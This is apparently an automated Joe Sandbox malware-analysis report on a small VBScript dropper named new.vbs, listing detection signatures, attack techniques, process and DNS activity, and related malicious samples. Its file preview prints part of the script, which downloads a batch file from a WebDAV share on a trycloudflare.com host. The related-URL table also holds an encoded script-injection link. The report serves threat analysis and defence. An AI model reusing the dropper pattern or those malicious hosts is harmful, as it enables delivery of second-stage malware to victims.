Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
new.vbs

Overview

General Information

Sample name:new.vbs
Analysis ID:1446638
MD5:136e1b4c719f11e872f06b8e1364592b
SHA1:be7cc342bc9fe94ea70bc79f376495068e1329c5
SHA256:661394d3e89eb5ab91210dc7d8dd1b0251c44ff0cfeac367158ca67c54968715
Tags:vbs
Infos:

Detection

Score:52
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Opens network shares
Sigma detected: WScript or CScript Dropper
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Found WSH timer for Javascript or VBS script (likely evasive script)
Java / VBScript file with very long strings (likely obfuscated code)
Program does not show much activity (idle)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Classification

  • System is w10x64
  • wscript.exe (PID: 2268 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\new.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\new.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\new.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2592, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\new.vbs", ProcessId: 2268, ProcessName: wscript.exe
Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\new.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\new.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2592, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\new.vbs", ProcessId: 2268, ProcessName: wscript.exe
No Snort rule has matched

Click to jump to signature section

Show All Signature Results

System Summary

barindex
Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
Source: new.vbsInitial sample: Strings found which are bigger than 50
Source: classification engineClassification label: mal52.spyw.winVBS@1/0@0/0
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\new.vbs"
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Stealing of Sensitive Information

barindex
Source: C:\Windows\System32\wscript.exeFile opened: \\tired-shareholders-reservoir-talked.trycloudflare.com@SSL\DavWWWRoot\google\Win\Jump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information21
Scripting
Valid AccountsWindows Management Instrumentation21
Scripting
1
DLL Side-Loading
1
DLL Side-Loading
OS Credential Dumping1
Network Share Discovery
Remote ServicesData from Local SystemData ObfuscationExfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
DLL Side-Loading
Boot or Logon Initialization Scripts1
Obfuscated Files or Information
LSASS Memory2
System Information Discovery
Remote Desktop ProtocolData from Removable MediaJunk DataExfiltration Over BluetoothNetwork Denial of Service
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
new.vbs0%ReversingLabs
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com
217.20.57.34
truefalse
    unknown
    fp2e7a.wpc.phicdn.net
    192.229.221.95
    truefalse
      unknown
      No contacted IP infos
      Joe Sandbox version:40.0.0 Tourmaline
      Analysis ID:1446638
      Start date and time:2024-05-23 18:25:12 +02:00
      Joe Sandbox product:CloudBasic
      Overall analysis duration:0h 2m 36s
      Hypervisor based Inspection enabled:false
      Report type:full
      Cookbook file name:default.jbs
      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
      Number of analysed new started processes analysed:2
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Sample name:new.vbs
      Detection:MAL
      Classification:mal52.spyw.winVBS@1/0@0/0
      EGA Information:Failed
      HCA Information:
      • Successful, ratio: 100%
      • Number of executed functions: 0
      • Number of non-executed functions: 0
      Cookbook Comments:
      • Found application associated with file extension: .vbs
      • Stop behavior analysis, all processes terminated
      • Exclude process from analysis (whitelisted): dllhost.exe
      • Excluded IPs from analysis (whitelisted): 40.127.169.103
      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, ocsp.edge.digicert.com, sls.update.microsoft.com, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
      • VT rate limit hit for: new.vbs
      No simulations
      No context
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comt3h7DNer1Q.exeGet hashmaliciousAsyncRAT, DcRatBrowse
      • 217.20.57.26
      https://allegroau.com/Get hashmaliciousUnknownBrowse
      • 217.20.57.18
      hesaphareketi_1.exeGet hashmaliciousAgentTeslaBrowse
      • 217.20.57.18
      BERTELLI NEW QUOTATION REQUEST.xlsGet hashmaliciousUnknownBrowse
      • 217.20.57.18
      https://wowwowhawaiianlemonade.comGet hashmaliciousUnknownBrowse
      • 217.20.57.18
      http://curve-amm.comGet hashmaliciousUnknownBrowse
      • 217.20.57.34
      https://skyasldights.ru.net/x4bQcxNS/index.htmlGet hashmaliciousUnknownBrowse
      • 217.20.57.18
      https://url2.mailanyone.net/scanner?m=1s81O6-0008Br-4D&d=4%7Cmail%2F90%2F1715966400%2F1s81O6-0008Br-4D%7Cin2d%7C57e1b682%7C17902772%7C12174482%7C664793DA5572258CACEE6A71CCB20F04&o=%2Fphty%3A%2Fmtseapesprstlmoc.&s=sNIZzYHyUIvQ6OVMbKtEQNJjOqkGet hashmaliciousUnknownBrowse
      • 217.20.57.34
      LsvjDwAj7O.exeGet hashmaliciousAsyncRATBrowse
      • 217.20.57.26
      https://504xr.r.a.d.sendibm1.com/mk/cl/f/sh/1t6Af4OiGsF30hSZitzIcPNmdcfVSs/63xYDNkPsgShGet hashmaliciousUnknownBrowse
      • 217.20.57.40
      fp2e7a.wpc.phicdn.nethttps://neuraxpharm.eurosbiolab.eu/?__cf_chl_rt_tk=TES3LKGEhjH1G5Ym.iTFDxwaSWwxOocOm2ySKfq7pJU-1716481117-0.0.1.1-1621Get hashmaliciousHtmlDropper, HTMLPhisherBrowse
      • 192.229.221.95
      https://sites.google.com/view/bakcsa3/?yj0&d=DwMFaQGet hashmaliciousUnknownBrowse
      • 192.229.221.95
      https://js.schema-forms.orgGet hashmaliciousUnknownBrowse
      • 192.229.221.95
      http://0x00003.000375.64090/images.php?p=%31%30%30%35%32%30%30%30%30%36%33%39%22%3E%3C%2F%64%69%76%3E%3C%73%63%72%69%70%74%3E%77%69%6E%64%6F%77%5B%27%6C%6F%63%61%74%69%6F%6E%27%5D%5B%27%72%65%70%6C%61%63%65%27%5D%28%5B%27%68%74%74%70%73%3A%2F%2F%69%6D%70%75%74%65%6C%65%74%74%65%27%2C%20%27%72%2E%63%6F%6D%2F%30%2F%30%2F%30%2F%27%2C%20%27%39%65%36%37%33%38%30%34%63%65%35%37%37%30%32%34%33%32%63%30%65%31%66%65%33%61%63%33%35%38%39%62%27%2C%27/12/101/10542/964/156117/16845%27%5D%5B%27%6A%6F%69%6E%27%5D%28%27%27%29%29%2C%64%6F%63%75%6D%65%6E%74%5B%27%62%6F%64%79%27%5D%5B%27%73%74%79%6C%65%27%5D%5B%27%6F%70%61%63%69%74%79%27%5D%3D%30%78%30%3B%3C%2F%73%63%72%69%70%74%3EGet hashmaliciousPhisherBrowse
      • 192.229.221.95
      http://al.levels.fyiGet hashmaliciousUnknownBrowse
      • 192.229.221.95
      https://github.com/ustaxes/UsTaxes/files/15378217/All.2023.Tax.Documents.zipGet hashmaliciousUnknownBrowse
      • 192.229.221.95
      https://invitebowlcheckout.info/bowlGet hashmaliciousUnknownBrowse
      • 192.229.221.95
      https://acrobat.adobe.com/id/urn:aaid:sc:VA6C2:90c503cb-cf61-4be1-b108-1df5bcac434aGet hashmaliciousUnknownBrowse
      • 192.229.221.95
      http://rb.gy/pcwqseGet hashmaliciousUnknownBrowse
      • 192.229.221.95
      https://wowwowhawaiianlemonade.comGet hashmaliciousUnknownBrowse
      • 192.229.221.95
      No context
      No context
      No context
      No created / dropped files found
      File type:ASCII text, with CRLF line terminators
      Entropy (8bit):5.064203166031721
      TrID:
      • Visual Basic Script (13500/0) 100.00%
      File name:new.vbs
      File size:904 bytes
      MD5:136e1b4c719f11e872f06b8e1364592b
      SHA1:be7cc342bc9fe94ea70bc79f376495068e1329c5
      SHA256:661394d3e89eb5ab91210dc7d8dd1b0251c44ff0cfeac367158ca67c54968715
      SHA512:378e43a8937c6f361a441a0527cec7fafc3cd521d45bb869ca62d9d4f206278a2f7c00a0b9a54cca58d80bc867fb1cc01f91404f2c5f30b945fbbef4a966e63f
      SSDEEP:24:W2MNoR2RpZOG7l4wAAErYqah71kV/cqrYC:qNoR2NJ7fb71kV/mC
      TLSH:4D11504E7513E621C4A75FF00A1B49EFD4ADD60D0024C05B7A54EAC83A357FC52D18D9
      File Content Preview:Dim webDavUrl, localFilePath, batFileName, objShell..webDavUrl = "\\tired-shareholders-reservoir-talked.trycloudflare.com@SSL\DavWWWRoot\google\Win\file.bat"..batFileName = "file.bat"..localFilePath = CreateObject("WScript.Shell").ExpandEnvironmentStrings
      Icon Hash:68d69b8f86ab9a86
      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
      May 23, 2024 18:26:31.331868887 CEST1.1.1.1192.168.2.110x36eaNo error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.34A (IP address)IN (0x0001)false
      May 23, 2024 18:26:31.331868887 CEST1.1.1.1192.168.2.110x36eaNo error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.18A (IP address)IN (0x0001)false
      May 23, 2024 18:26:32.041528940 CEST1.1.1.1192.168.2.110x480aNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
      May 23, 2024 18:26:32.041528940 CEST1.1.1.1192.168.2.110x480aNo error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false

      Click to jump to process

      Click to jump to process

      Click to dive into process behavior distribution

      Target ID:0
      Start time:12:26:11
      Start date:23/05/2024
      Path:C:\Windows\System32\wscript.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\new.vbs"
      Imagebase:0x7ff7a8ab0000
      File size:170'496 bytes
      MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
      Has elevated privileges:false
      Has administrator privileges:false
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:true

      No disassembly